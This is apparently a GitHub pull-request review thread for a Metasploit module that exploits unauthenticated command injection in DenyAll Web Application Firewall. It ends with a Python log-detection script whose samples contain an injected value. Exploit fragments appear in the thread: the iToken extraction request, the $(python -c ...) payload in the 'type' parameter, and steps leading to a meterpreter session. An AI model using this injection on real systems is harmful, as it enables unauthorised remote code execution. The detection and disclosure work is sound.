Adding DenyAll Web Application Firewall RCE module #8980
Conversation
```ruby
}
})

if res && res.code == 200 && res.body.include?("iToken")
```
This iToken extraction code should be moved to a separate method, since the exact same code is also required for exploitation. We can save a few lines of code.
It's done and retested. Thank you very much for the review.
If I get some time over the weekend (which is likely), I've got my eye on this.
```
@@ -0,0 +1,37 @@
## Vulnerable Application

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.
```
Unauthenticated users
```
**Vulnerable Application Installation Steps**
```
For consistency, I think you can remove this bold area and just let it all blend into one.
```
You just need to follow instruction above URL.
```
```
## Verification Steps
```
Verification steps should be like in your PR submission; see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/ms17_010_eternalblue.md#verification-steps for an example.
```
A successful check of the exploit will look like this:
```
Add the heading `## Scenarios`.
```ruby
super(update_info(info,
  'Name' => "DenyAll Web Application Firewall Remote Code Execution",
  'Description' => %q{
    This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a
```
users
```ruby
def exploit
  # Get iToken from unauthenticated accessible endpoint
  print_status("Extracting iToken value")
```
Change `"` to `'`.
```ruby
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
'vars_get' => {
  'applianceUid' => "LOCALUID",
  'typeOf' => "debug"
```
Change `"` to `'`.
```ruby
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
'vars_get' => {
  'applianceUid' => "LOCALUID",
```
Change `"` to `'`.
```ruby
'iToken' => token,
'tag' => "tunnel",
'stime' => r,
'type' => "#{r}$(python -c \"#{payload.encoded}\")"
```
If the server is PHP based, was there a particular reason why the default payload is Python? There is a PHP meterpreter, but I didn't know if the PHP pushes to Python or something like that, where Python would be the better option.
Thanks for all the review @h00die. Node.js, Python and different types of technologies are also being used by this product. Also, as far as I know, the Python meterpreter has many more capabilities than the PHP one, such as stdapi.
I'll give this a run over the weekend. I'll also try out the PHP payload; it would be a good thing to note that it also works (for curious minds like myself who have encountered issues in the past).
```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
```
These look to be public IPs (unverified); you may want to change them to something else, like 1.1.1.1 and 2.2.2.2.
It was my AWS London instance IP that I used for testing purposes. It's not alive anymore.
Worked fine for me! I actually deployed 6.2.0. Switched to a generic shell as well.
A few minor edits on the docs still left to do and I'll get this landed!
I take it back, landing now.
Release Notes

The DenyAll Web Application Firewall Remote Code Execution module has been added to the framework. It targets versions 6.3.0 and 6.2.0.
Thanks for the contribution; it looked pretty good from the start, and thanks for being so responsive!
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.

Verification

List the steps needed to make sure this thing works:

1. Start `msfconsole`
2. `use exploit/linux/http/denyall_waf_exec`
3. Set `RHOST`
4. Set `LHOST`
5. `check`: "The target appears to be vulnerable."
6. `exploit`
7. `iToken` value extraction.
8. `meterpreter` session.

Here is the advisory and technical details about that vulnerability:
https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/
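The module in this PR first fetches an `iToken` from the unauthenticated `webservices/download/index.php` endpoint (`typeOf=debug`) and then sends a shell expression in the `type` parameter. As an added example that is not part of the PR or the framework, the Python below detects both steps in constructed Apache-style access-log lines and correlates them per client IP; the log format and sample values are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter names come from the module diff in this PR.
ENDPOINT = "/webservices/download/index.php"
# A legitimate 'type' value is numeric; shell metacharacters indicate injection.
SHELL_META = re.compile(r"[$`;|&]")
# Apache combined-log prefix: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access-log lines (assumed format), not taken from the PR or the product.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Oct/2017:10:00:00 +0000] "GET /webservices/download/index.php?applianceUid=LOCALUID&typeOf=debug HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Oct/2017:10:00:01 +0000] "GET /webservices/download/index.php?applianceUid=LOCALUID&iToken=abc123&tag=tunnel&stime=1234&type=1234%24%28python+-c+%22x%22%29 HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Oct/2017:10:05:00 +0000] "GET /webservices/download/index.php?applianceUid=LOCALUID&iToken=def456&tag=tunnel&stime=99&type=99 HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Oct/2017:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 2048',
]


def analyze(line):
    """Return a finding for one log line, or None if it is not suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != ENDPOINT:
        return None
    # parse_qs percent-decodes values, so the injected string is inspected as the server saw it.
    q = {k: v[0] for k, v in parse_qs(url.query).items()}
    finding = {"ip": m.group("ip"), "ts": m.group("ts")}
    if q.get("typeOf") == "debug" and "iToken" not in q:
        finding["reason"] = "unauthenticated iToken fetch (typeOf=debug)"
        return finding
    if "type" in q and SHELL_META.search(q["type"]):
        finding["reason"] = "shell metacharacters in 'type' parameter"
        finding["type"] = q["type"]
        return finding
    return None


def scan(lines):
    """Findings for every suspicious line, in log order."""
    return [f for f in (analyze(l) for l in lines) if f]


def full_chain_ips(findings):
    """Client IPs that both fetched a token and sent an injected 'type' value."""
    fetched = {f["ip"] for f in findings if f["reason"].startswith("unauthenticated")}
    injected = {f["ip"] for f in findings if f["reason"].startswith("shell")}
    return sorted(fetched & injected)
```

A token fetch alone is normal appliance traffic; the correlated pair from one client is the signal worth alerting on.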